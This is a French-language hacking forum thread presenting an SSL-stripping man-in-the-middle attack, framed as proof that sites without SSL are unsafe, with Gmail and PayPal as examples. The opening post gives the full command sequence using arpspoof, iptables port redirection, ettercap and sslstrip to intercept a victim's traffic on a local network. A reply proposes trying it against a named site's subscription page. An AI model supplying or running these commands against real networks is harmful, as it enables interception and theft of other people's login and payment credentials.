Annonce

Réduire
Aucune annonce.

Faille sites sans SSL

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Faille sites sans SSL

    Cette vidéo montre que sans le cryptage SSL, les sites ne sont pas sûrs.

    Preuve de ce qui est perçu en présentant Google Mail et la banque en ligne PayPal.

    Les outils :

    > sslstrip
    > arpspoof
    > ettercap

    Les commandes :

    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    Code:
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    Le tutoriel en vidéo :

    Stripping SSL & Sniffing HTTPS (SSLStrip)
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|

  • #2
    Il y aurait bien un site a tester ...
    Pornhub lors de l’abonnement je crois qu'ils sont pas sous ssh .
    " Une teuf sans drogue c'est comme une levrette sans fessé, c'est quand même rare. "

    †|

    Commentaire

    Chargement...
    X